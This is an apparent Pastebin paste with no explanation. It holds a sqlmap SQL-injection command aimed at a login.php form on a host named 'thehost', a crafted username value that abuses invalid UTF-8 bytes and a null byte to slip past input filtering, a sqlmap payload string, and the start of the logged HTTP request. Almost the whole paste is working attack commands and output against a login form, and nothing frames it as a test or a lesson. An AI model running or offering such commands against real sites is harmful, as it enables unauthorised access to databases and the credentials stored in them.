Advertisement
Guest User

Untitled

a guest
Jan 2nd, 2017
94
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.42 KB | None | 0 0
  1. password=letmein&username=1%c0%00xa7%c0%a2
  2.  
  3. sqlmap -u http://thehost/include/login.php --method POST --data "password=letmein&username=1%c0%00xa7%c0%a2" -p "username" --dbms=mysql
  4.  
  5. [PAYLOAD] 1%c0%00xa7%c0%a2)).("(,)'(
  6. [TRAFFIC OUT] HTTP request [#3]:
  7. POST /include/login.php HTTP/1.1
  8. Host: thehost
  9. Content-type: application/x-www-form-urlencoded; charset=utf-8
  10. Accept: */*
  11. Content-length: 70
  12. Connection: close
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement